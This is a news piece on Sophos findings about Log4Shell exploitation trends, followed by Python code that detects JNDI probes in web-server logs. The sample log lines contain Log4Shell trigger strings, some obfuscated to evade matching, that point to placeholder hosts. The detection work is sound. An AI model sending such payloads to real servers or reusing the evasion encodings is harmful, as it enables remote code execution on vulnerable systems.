New threat intelligence from Sophos following the Apache Log4Shell vulnerability
Sophos has provided new threat intelligence following the reporting of the Apache Log4Shell vulnerability.
The information shows how cyberattackers are already exploiting or attempting to exploit unpatched systems. This is detailed in the SophosLabs Uncut article, Log4Shell Hell: Anatomy of an Exploit Outbreak.
Sophos says it's seeing a rapid uptick in attacks exploiting or attempting to exploit this vulnerability, with hundreds of thousands of attempts detected so far. It says cryptomining botnets are among the earliest attack adopters, with botnets focusing on Linux server platforms, which are particularly exposed to this vulnerability. The company has also seen attempts to extract information from services, including Amazon Web Services keys and other private data.
Sophos has observed that attempts to exploit network services start by probing for different types of service. It says around 90% of the probes it detected were focused on the Lightweight Directory Access Protocol (LDAP). A smaller number of probes targeted Java's Remote Method Invocation (RMI), but Sophos researchers say there seems to be a larger variety of unique RMI-related attempts.
"Expect adversaries to intensify and diversify their attack methods and motivations in the coming days and weeks, including the possibility of leveraging for ransomware," says Sophos.
Sean Gallagher, senior threat researcher at Sophos and author of the SophosLabs Uncut article, says that since Dec 9th, Sophos has detected hundreds of thousands of attempts to remotely execute code using the Log4Shell vulnerability.
"Initially, these were Proof-of-Concept (PoC) exploit tests by security researchers and potential attackers, among others, as well as many online scans for the vulnerability," he says.
"This was quickly followed by attempts to install coin miners, including the Kinsing miner botnet. The most recent intelligence suggests attackers are trying to exploit the vulnerability to expose the keys used by Amazon Web Service accounts. There are also signs of attackers trying to exploit the vulnerability to install remote access tools in victim networks, possibly Cobalt Strike, a key tool in many ransomware attacks."
He says the Log4Shell vulnerability presents a different kind of challenge for defenders. Many software vulnerabilities are limited to a specific product or platform, such as the ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange.
"Once defenders know what software is vulnerable, they can check for and patch it," says Gallagher.
"However, Log4Shell is a library used by many products. It can therefore be present in the darkest corners of an organisation's infrastructure, for example, any software developed in-house. Finding all systems that are vulnerable because of Log4Shell should be a priority for IT security."
Sophos expects the speed with which attackers harness and use the vulnerability will only intensify and diversify over the coming days and weeks. It says once an attacker has secured access to a network, then any infection can follow. So alongside the software update already released by Apache in Log4j 2.15.0, IT security teams need to do a thorough review of activity on the network to spot and remove any traces of intruders, even if it just looks like nuisance commodity malware.
New and additional information on how Log4Shell works is also available in the Sophos Naked Security article, Log4Shell Explained: How it Works, Why You Need to Know, and How to Fix It, by Paul Ducklin.
"Technologies including IPS, WAF and intelligent network filtering are all helping to bring this global vulnerability under control," says Sophos principal research scientist, Paul Ducklin.
"But the staggering number of different ways that the Log4Shell 'trigger text' can be encoded, the huge number of different places in your network traffic that these strings can appear, and the wide variety of servers and services that could be affected are collectively conspiring against all of us."
He says the very best response is clear: patch or mitigate your systems right now. "Our article provides practical advice that explains how the vulnerability works, why it works, what it can do, and how to fix it."
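As an added illustration of two points made above, the LDAP/RMI split among probes and the many ways the trigger text can be encoded, here is example detection code that is not from Sophos or the articles cited: it resolves nested Log4j lookups in web-server log lines and tallies JNDI probes by scheme. The log lines and addresses are constructed placeholders.

```python
import re
from collections import Counter

# Sample web-server log lines, constructed for this example (not real traffic).
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.6 - - "GET /login HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:r}mi://203.0.113.11:1099/x}"',
    '10.0.0.7 - - "GET /api HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:ldaps://203.0.113.12/z}"',
    '10.0.0.8 - - "GET /health HTTP/1.1" 200 "-" "Mozilla/5.0 (compatible; monitor)"',
]

# Log4j 2 lookups that get nested inside the trigger text to hide it from
# naive string matching: ${lower:X}/${upper:X} change case, and ${::-X} is the
# "default value" form that simply evaluates to X. Resolving the innermost
# lookups first (the character classes exclude $ { }) reveals the plain
# ${jndi:...} form that a signature can match.
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")


def normalize(text: str) -> str:
    """Collapse nested Log4j lookups until nothing more can be resolved."""
    prev = None
    while prev != text:
        prev = text
        text = _CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        text = _DEFAULT.sub(lambda m: m.group(1), text)
    return text


_JNDI = re.compile(r"\$\{jndi:([a-z][a-z0-9+.-]*):", re.IGNORECASE)


def find_jndi_scheme(line: str):
    """Return the JNDI scheme (ldap, ldaps, rmi, dns, ...) if the line carries a lookup, else None."""
    m = _JNDI.search(normalize(line))
    return m.group(1).lower() if m else None


def count_probes(lines):
    """Tally probe lines by JNDI scheme, the way a SOC would to see the LDAP/RMI split."""
    return Counter(s for s in map(find_jndi_scheme, lines) if s)


if __name__ == "__main__":
    print(count_probes(SAMPLE_LOGS))  # Counter({'ldap': 1, 'rmi': 1, 'ldaps': 1})
```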